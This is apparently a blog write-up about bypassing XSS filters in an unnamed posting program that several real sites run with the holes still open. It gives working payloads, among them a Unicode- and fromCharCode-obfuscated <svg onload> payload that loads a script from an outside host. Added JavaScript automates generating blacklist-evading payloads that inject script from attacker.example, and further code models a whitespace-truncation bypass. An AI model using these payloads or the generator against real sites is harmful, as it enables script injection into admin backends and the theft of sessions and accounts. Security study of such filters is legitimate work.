An interesting XSS vulnerability mining analysis (1)

Source: Internet
Author: User

Recently I met a new friend who pestered me every day to do XSS with him. After three days I feel this program is actually quite interesting. Since this is a write-up after the fact, there are no screenshots, but I hope sharing the experience helps friends who love XSS as much as I do. I personally prefer rich-text XSS because it's fun: the interesting part is probing, bit by bit, what gets filtered and how it gets filtered. I think that is the most fascinating part of black-box testing.

First, I narrowed things down to the post-submission module, because that section has a rich text editor. Then I started fuzzing the filter rules. There are two input points in total: title and content.
I generally like to start with the content, because there is no length limit there. First, test some tags that can be used for XSS:

<script><a><p><body><button><var><div><iframe><meta><object><marquee><isindex><input><select><keygen><frameset><embed><svg><math><video><audio><textarea>

After a round of tests, only <a> and one other tag survived. Rather awkward. In this situation the attributes one can generally use are onload, onerror, onmouseover, onclick and href.
Having sorted out my thinking, I started the second round of tests, the attribute tests:

<a href onmouseover onclick>

After testing, those handy on* event attributes were all filtered out. On top of that, to block insertion of <script> there is a filter on the substring "scr", and because the word "javascript" also contains "scr", href cannot carry the javascript: pseudo-protocol either.
At that point I thought of a data URI (<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4=>help</a>, which decodes to <script>alert(41)</script>). At least Firefox would then inherit the current domain (true of the Firefox versions of that time; modern Firefox gives a data: document a unique origin and blocks top-level navigation to data: URLs from web content altogether). But my buddy didn't want that. After all, this is an admin backend, so only a payload that works in every browser is worth anything; otherwise it's wasted effort. So I turned back to the title field and repeated the test flow above. By accident I discovered that the title did not filter the <img> tag, and that among the event attributes only onload was not filtered. So let's try that.

It was intercepted. After an annoying round of tests it turned out that "document" was filtered. All right... convert it to Unicode escapes and keep bypassing:

That went through, but it wrecked the page layout. Well, everyone has their dumb days. I re-registered an account. Thinking I would get it done in one shot this time, and still avoiding single quotes, I wrote:

Well, intercepted again. I tested for a long time and finally got impatient (the title has a length limit; if you cannot pin down which characters are filtered and instead encode the whole thing, the length will not be enough). It turned out that "char" was filtered (looks like the anti-injection and anti-XSS filters are written together... why so cheap?). So that route was out too. Change approach:

Finally I wrote a payload with no document, no char and no scr; two more characters and it would not have fit. After writing the generic payload I sent it to my buddy. A day later he messaged me again: there is another site running the same program, but the payload does not work there.

I don't know why one suite of software has so many variants. This time the situation was more interesting. Tags inserted into the content were HTML-encoded, and the <img> tag could no longer be inserted in the title. I thought it must be an upgraded version. He said fine, if I knew it could not be done there was no need to keep wrestling with it. Whoever quits first loses, so I continued with the previous approach and fuzzed the tags allowed in the title, and found four, among them:
<div> <style> <a>
Then I started attribute testing with the same method as above, and found that <p onmouseover> went through fine, so the earlier payload only needed a small change.

I sent him off to bed. On the third day he came back with yet another site, saying neither of the previous two methods worked. Strange. Who on earth maintains this marvellous program, f4ck it. This time it was even more interesting: the title and content were both HTML-encoded, and the editor had been removed outright. But this version had a lot of new features, one of them called Upload image. Honestly, by this point I was already tired. But giving up is not in my character, so I had to keep going. This is where I love Linux: its file naming rules are not as fussy as Windows'. I made an image and renamed it to:

.png

Because it is a new feature, the programmer does not HTML-encode the file name before putting it in the page, and the little box popped up once again. Much more comfortable... But there is a new problem. Because this is a file upload, the payload cannot contain "/"; I think it gets recognized as a path separator and then truncated. Another approach:

<svg Onload=\u0064ocument.write(String.from\u0043harCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62))>

A payload with no "scr", no "char", no "document" and no "/" could thus be written: \u0064ocument is just document with its first letter as a Unicode escape, which the JavaScript lexer accepts inside an identifier but the substring filter does not match; from\u0043harCode does the same for fromCharCode; and the character-code list decodes to <script src=//zsy.ca/33></script>, so the only "/" characters live inside numbers.
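To make the bypass concrete, here is an added example (not code from the original post) that models a case-insensitive substring blacklist like the one described, builds the same shape of payload automatically for any HTML fragment, and checks that the obfuscated handler still runs as JavaScript. The blacklist terms, the //attacker.example/x.js URL and the fake document object are assumptions made for the demonstration.

```javascript
// Added example: automate the "\u escape + String.fromCharCode" bypass from the post.
// Assumed blacklist modelled on the one described (case-insensitive substring match).
const BANNED = ["scr", "char", "document", "/"];

// Returns the blacklist terms that a candidate payload would trip.
function blacklistHits(input, banned = BANNED) {
  const lower = input.toLowerCase();
  return banned.filter((term) => lower.includes(term.toLowerCase()));
}

// Turn a string into a String.fromCharCode(...) call so that no byte of the
// original string (including "/" and "<script") appears literally.
function toCharCodeCall(str) {
  const codes = Array.from(str, (c) => c.charCodeAt(0)).join(",");
  return `String.fromCharCode(${codes})`;
}

// For each banned term found in JS source, replace the first character of the
// match with its \uXXXX escape. The JS lexer still reads the escaped identifier
// (\u0064ocument === document), but the filter no longer sees the substring.
// This only works inside identifiers, so matches on punctuation are rejected.
function escapeBannedInIdentifiers(js, banned = BANNED) {
  let out = js;
  for (const term of banned) {
    const re = new RegExp(term.replace(/[.*+?^${}()|[\]\\\/]/g, "\\$&"), "gi");
    out = out.replace(re, (m) => {
      if (!/[A-Za-z_$]/.test(m[0])) {
        throw new Error(`cannot escape "${m}" outside an identifier`);
      }
      return "\\u" + m.charCodeAt(0).toString(16).padStart(4, "0") + m.slice(1);
    });
  }
  return out;
}

// Build the <svg onload=...> payload for an arbitrary HTML fragment.
// The attribute value is left unquoted, so it must contain no whitespace
// or other characters that end an unquoted attribute value.
function buildSvgOnloadPayload(html, banned = BANNED) {
  const js = `document.write(${toCharCodeCall(html)})`;
  const handler = escapeBannedInIdentifiers(js, banned);
  if (/[\s"'=<>`]/.test(handler)) {
    throw new Error("handler is not safe as an unquoted attribute value");
  }
  return `<svg onload=${handler}>`;
}

// Pull the handler back out of the tag (everything after "onload=" up to ">").
function extractOnloadHandler(payload) {
  const m = /onload=([^>]*)>/i.exec(payload);
  if (!m) throw new Error("no onload attribute");
  return m[1];
}

// Execute the handler the way an event-handler body would run, with a fake
// document (assumption) that records what document.write received.
function runHandler(handlerJs) {
  const written = [];
  const fakeDocument = { write: (s) => written.push(String(s)) };
  new Function("document", handlerJs)(fakeDocument);
  return written.join("");
}

// Constructed input: the same shape the post injects, with a placeholder host.
const INJECTED_HTML = "<script src=//attacker.example/x.js></script>";
const PAYLOAD = buildSvgOnloadPayload(INJECTED_HTML);
const NAIVE_PAYLOAD = `<svg onload=document.write("${INJECTED_HTML}")>`;

console.log(PAYLOAD);
console.log("naive payload trips:", blacklistHits(NAIVE_PAYLOAD));
console.log("obfuscated payload trips:", blacklistHits(PAYLOAD));
console.log("handler writes:", runHandler(extractOnloadHandler(PAYLOAD)));
```

The generator goes a little beyond the post: any banned term that lands inside an identifier is escaped at its first character, not just "document" and "char", while a term that can only match punctuation (such as "/") is reported as unescapable so that the string-literal route through String.fromCharCode has to be used instead.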
But it was not over yet. He later sent me one more variant, saying the payload could be inserted but would not execute. I took over the site and had a look. Good grief, this one was even more fun. On the previous three sites the title length limit was 100 (not client-side validation; the limit came from the database field definition). Here the length was 35, and everything after that was eaten. Apparently the database side had not changed, but a limit had been added in the PHP code. On top of that there was an Anquanbao ("security treasure") WAF in front. The rest of the payload could be split up, but chopping this onmouseover payload into 10 or 20 pieces and lining them up one after another... I had no confidence in that. I could only look for another payload. I was tired by now, so I just tried something:


After posting, it became:

For a moment I did not understand what was going on, so I tried again:

and it became:

It turned out that whenever more than one space is present, everything from the second space onward is dropped. Fine then, change the spaces: I fired up a hex editor and replaced the second space with 0x0c (form feed):

After saving, copy the payload in:

The little box finally popped up. The general idea: the previously filtered strings (document, scr, char, "/") are converted to octal escapes, and the assembled content has to be eval'd at the end. It goes like this:
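The whitespace trick deserves a closer look, so here is an added example (not from the original post) that models a server-side check which keeps a title only up to its second 0x20 space, and a small start-tag tokenizer that follows the HTML tokenizer's whitespace set (TAB, LF, FF, CR and SPACE all separate attributes). The two-attribute <p> payload and the exact truncation rule are constructed assumptions; the post does not show the server code or the final payload.

```javascript
// Added example: why replacing the second 0x20 with 0x0c survives a split-on-space
// server check while the browser still parses both attributes normally.

// Characters the HTML tokenizer treats as whitespace between attributes
// (WHATWG "before attribute name" state; CR is normalised to LF beforehand).
const HTML_WS = new Set(["\t", "\n", "\f", "\r", " "]);

// Assumed model of the server behaviour the post observed: keep the text up to
// the second ASCII space (0x20) and drop the rest. Only 0x20 counts as a space.
function dropFromSecondSpace(title) {
  const first = title.indexOf(" ");
  if (first === -1) return title;
  const second = title.indexOf(" ", first + 1);
  return second === -1 ? title : title.slice(0, second);
}

// Minimal start-tag tokenizer: returns the tag name and its attributes, splitting
// on the HTML whitespace set rather than on 0x20 alone. Throws if the tag is not
// complete, which is what a truncated title looks like to this parser.
function parseStartTag(tag) {
  if (!tag.startsWith("<") || !tag.endsWith(">")) {
    throw new Error("not a complete start tag: " + JSON.stringify(tag));
  }
  const body = tag.slice(1, -1);
  let i = 0;
  const readWhile = (pred) => {
    const start = i;
    while (i < body.length && pred(body[i])) i++;
    return body.slice(start, i);
  };
  const name = readWhile((c) => !HTML_WS.has(c)).toLowerCase();
  const attrs = {};
  for (;;) {
    readWhile((c) => HTML_WS.has(c)); // skip separators, whichever byte they are
    if (i >= body.length) break;
    const attrName = readWhile((c) => !HTML_WS.has(c) && c !== "=").toLowerCase();
    let value = "";
    if (body[i] === "=") {
      i++;
      if (body[i] === '"' || body[i] === "'") {
        const quote = body[i++];
        value = readWhile((c) => c !== quote);
        i++; // closing quote
      } else {
        value = readWhile((c) => !HTML_WS.has(c));
      }
    }
    attrs[attrName] = value;
  }
  return { name, attrs };
}

// Constructed payload: two attributes, so one separator is needed between them.
// A style that covers the page makes the onmouseover fire on any mouse movement.
const ATTRS = ["onmouseover=alert(1)", "style=position:fixed;top:0;left:0;width:100%;height:100%"];
function buildTitle(separator) {
  return "<p " + ATTRS.join(separator) + ">";
}

// Hex view of the bytes, to see what the hex-editor step actually changed.
function toHex(s) {
  return Array.from(new TextEncoder().encode(s), (b) => b.toString(16).padStart(2, "0")).join("");
}

const WITH_SPACE = buildTitle(" ");
const WITH_FF = buildTitle("\f");

console.log("stored (space):", JSON.stringify(dropFromSecondSpace(WITH_SPACE)));
console.log("stored (0x0c): ", JSON.stringify(dropFromSecondSpace(WITH_FF)));
console.log("parsed (0x0c): ", parseStartTag(dropFromSecondSpace(WITH_FF)));
console.log("hex    (0x0c): ", toHex(WITH_FF));
```

Any byte in HTML_WS other than 0x20 would do the same job against a server that only looks for spaces, so the choice of 0x0c is about what the other filtering layers leave alone rather than about the browser; confirm the result in the target browser, since this tokenizer only models the attribute-separator rule.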


When inserting them, insert in reverse order (because the posts are listed by time, newest first). With that it was finally done. It was a very interesting experience. This is a bit long, but reading it patiently should be helpful. Although this is not some top-tier program, many domestic *** use this suite, so it is inconvenient to disclose which one. If you know what it is, I hope you will not say.

